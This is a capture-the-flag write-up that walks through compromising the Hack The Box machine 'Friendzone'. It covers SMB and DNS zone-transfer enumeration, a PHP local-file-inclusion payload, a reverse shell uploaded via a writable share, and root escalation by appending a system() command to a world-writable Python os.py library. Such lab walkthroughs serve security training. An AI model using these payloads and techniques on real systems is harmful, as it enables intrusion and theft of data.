Hack the box - Friendzone write-up

Let's get started by nmap -
nmap -sC -sV -v 10.10.10.123
Here -sC is for default scripts -sV is to enumerate all version. We get the following result from nmap - 





Since port 80 and 443 are open let's try these first by a simple recon through our browser, upon directly visitinghttp://10.10.10.123 we are greeted with this page -



If you notice, there is an email ID in this page info@friendzoneportal.red hence friendzoneportal.redcould be a valid virtualhost domain. Let's note it down and continue recon on port 80.
If we enter this very common URL - http://10.10.10.123/robots.txt we are trolled by the creator of the machine with this text on webpage -
seriously ?!
Let's start dirb in the background to search any other hidden pages -
dirb 10.10.10.123
Unfortunately, dirb does not give us any useful result. Let's move on to https service.
When we visit https://10.10.10.123 there will be a security warning regarding certificate supplied by the server, viewing ssl/tls certificate can provide some valuable information, so it's always a good idea to have a good look at certificate information.





Here we got one more domain friendzone.red , let's add both of these domains to our local /etc/hosts file to further enumerate them. Your hosts file should look like this -



Upon visiting friendzone.red we are again greeted with this page - 



Upon viewing the source code, I found something interesting -
<title>FriendZone escape software</title>

<br>
<br>


<center><h2>Ready to escape from friend zone !</h2></center>


<center><img src="e.gif"></center>





Now obviously we will visit the location in comments :D , Upon visiting https://friendzone.red/js/js/ and viewing source code we find this -

<p>Testing some functions !</p><p>I'am trying not to break things !</p>ck43TzFCaExaczE1NjMxNzMzMjNXYW8wSkZkSzBl

After spending a good amount of time on this URL, I gave up and moved on to other domain, later I found out this was a rabbit hole indeed. :-/

Lets visit https://friendzoneportal.red/ , we get this page -



I ran dirb tool on this domain with various wordlists but didn't find anything useful.
Since I already lost a good amount of time on port 80 & 443, I moved on to enumerating SMB services since port 139 & 445 were open. Nmap comes with very powerful scripts to enumerate lots of different services. I used this NSE scripts to enum smb -
nmap --script smb-enum-shares.nse -p445 10.10.10.123
And here are the results! -



We can see various smb shares and we have permission to read and write on some of these.

A quick way to view files on a smb share is through this command -
smbclient //< server ip>/< share name>
But if you want to view a lot of files or write files to smb share then it's better to mount it as a volume.

In Kali linux you can quickly do this by opening file manager and click on other locations, here at the bottom we can specify an address where we want to connect.
Enter smb://10.10.10.123/general/ in location and when prompted for credentials , just log in as a Anonymous user.





We only get one file here named creds.txt and contains this text -
creds for the admin THING:

admin:WORKWORKHhallelujah@#

So we got credentials but we don't know where to use them! 
Let's check Development share in similar way!
One interesting this about this share is that we can actually upload and modify existing files in this share ! Here I have written to a file named yashpl.me - 



We don't have any permission for other SMB shares, so let's move on to other services!

This box also has ports 53 open with DNS service running on it, this service really stands out in a CTF environment as most machine don't require dns resolution of any kind!

I enumerated port 53 through nslookup by setting server as 10.10.10.123 so that our queries are answered by the box we are enumerating and tried various queries - localhost , 127.0.0.1 , friendzoneportal.red andfriendzone.red -



I did not get any useful information but then I remembered that this DNS service is running on TCP rather than UDP! By default domain (dns) service runs on UDP and only in few special cases TCP is selected as UDP has limit of 512 bytes.
The special case is when DNS supports zone transfers or very rarely DNSSEC features! Let's try to get zone transfer file from this box!
I used dig tool to dig some information! , pun intended! :P
dig axfr friendzoneportal.red @10.10.10.123
dig axfr friendzone.red @10.10.10.123
Lo and Behold, we got a lot of subdomains from both virtual domains! - 



There are a lot of URLs here and most of them were trolls / rabbit holes from creator of this machine which again wasted a lot of time, without wasting any more of your time lets jump to next step and enumeratehttps://administrator1.friendzone.red/.
First, add this url to \etc\hosts file then view it in the browser and here we get a login page!



Remember we found credentials in one of the samba shares? This is where we use them! After logging in we get a page saying this -

Login Done ! visit /dashboard.php

Visiting dashboard.php page gives us this msg - 



let's add these parameters to URL and visit -https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp



My first intuition was to check for LFI vulnerability in image_id and pagename parameter. The image_id parameter was just reflecting it in the source code but pagename parameter was actually including the file.

Lets pass these request through burp to get more control and try to exploit LFI.



I tried various payloads and lists but was unable to exploit as you can see in above image.
It was due to code of dashboard.php file , It could be the case where instead of directly including file like this -
include($_GET[‘pagename’]);
The code had extension added to include statement like this -
include($_GET['pagename'].“.php”);
To confirm above whether this was the case, I used php filters to base64 encode the code of dashboard.php and print it.
this was the payload -
pagename=php://filter/convert.base64-encode/resource=dashboard
And here we got the base64 encoded source code of dashboard.php, we can use BURP suite's decoder tab to decode it.




This was decoded from base64 encoded text -


//echo "

Smart photo script for friendzone corp !

";
//echo "

* Note : we are dealing with a beginner php developer and the application is not tested yet !

";
echo "FriendZone Admin !"; $auth = $_COOKIE["FriendZoneAuth"]; if ($auth === "e7749d0f4b4da5d03e6e9196fd1d18f1"){ echo " "; echo "

Smart photo script for friendzone corp !

"
; echo "

* Note : we are dealing with a beginner php developer and the application is not tested yet !

"
; if(!isset($_GET["image_id"])){ echo " "; echo "
image_name param is missed !
"
; echo "
please enter it to show the image
"
; echo "
default is image_id=a.jpg&pagename=timestamp
"
; }else{ $image = $_GET["image_id"]; echo "
"
; echo "

Something went worng ! , the script include wrong param !

"
; include($_GET["pagename"].".php"); //echo $_GET["pagename"]; } }else{ echo "
You can't see the content ! , please login !

As you can see, in include statement, we can exploit LFI but only with .php files!
Looking back, we found an SMB share where we can upload files (development) and with NSE enumeration script we know the location where this is mounted, that is /etc/Development

So if we upload a shell to smb share and pass its url to dashboard.php we will have a code execution!
Lets upload a shell from this page with my IP & port number to smb share - 



Then start a listener by this command -
nc -lvnp 9000
Then in burp suit include our shell and execute it - 



And we poped a shell!! :)



This is a low privilege shell from user www-data but we can still read user.txt file as shown by wc user.txtcommand, which counts the characters in file. 

33 word count is 32 character flag + new line character.
Lets upgrade to a tty shell by executing these commands -
# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
hit - Ctrl-Z

# In Kali / host machine
$ stty raw -echo
$ fg

# In reverse shell

$ export SHELL=bash
$ export TERM=xterm-256color
$ reset

I checked all the common locations and in /var/www I found a file mysql_data.conf It had these credentials -

for development process this is the mysql creds for user friend

db_user=friend

db_pass=Agpyu12!0.213$

It is a common practice to reuse credentials so I tried logging in as friend user and same password as db_passparameter and I successfully logged in!



Again, this was a useless privilege escalation as I did not gain any more privileges than www-data user! So we can continue with www-user user.

Then I switched to enumrating all the processes running in this box, using a tool called pspy, you can find it here .

I uploaded a statistically typed executable of this tool to smb share and copied it to /dev/shm since we don't have permission to make uploaded files executable in /etc/Developement directory.
Then we execute this tool -



I saw an unusual script running through root account /bin/sh -c /opt/server_admin/reporter.py.
Upon further inspection, it was just a dummy script which did nothing besides importing os.py.



Since I cant edit this script, I thought to check is library folder of python is writable, if this is the case then I can just hijack os.py library and execute my code that way.
I checked permissions of os.py file and YES, we can hijack it!!
www-data@FriendZone:/$ ls -al /usr/lib/python2.7/os.py
-rwxrwxrwx 1 root root 25910 Jan 15 22:19 /usr/lib/python2.7/os.py
I added this -
system("cp /root/root.txt /etc/Development/yashpl; chmod 777 /etc/Development/yashpl")
payload to the end of /usr/lib/python2.7/os.py file and waited for root to execute that script again.
And Finally, we have our root flag! -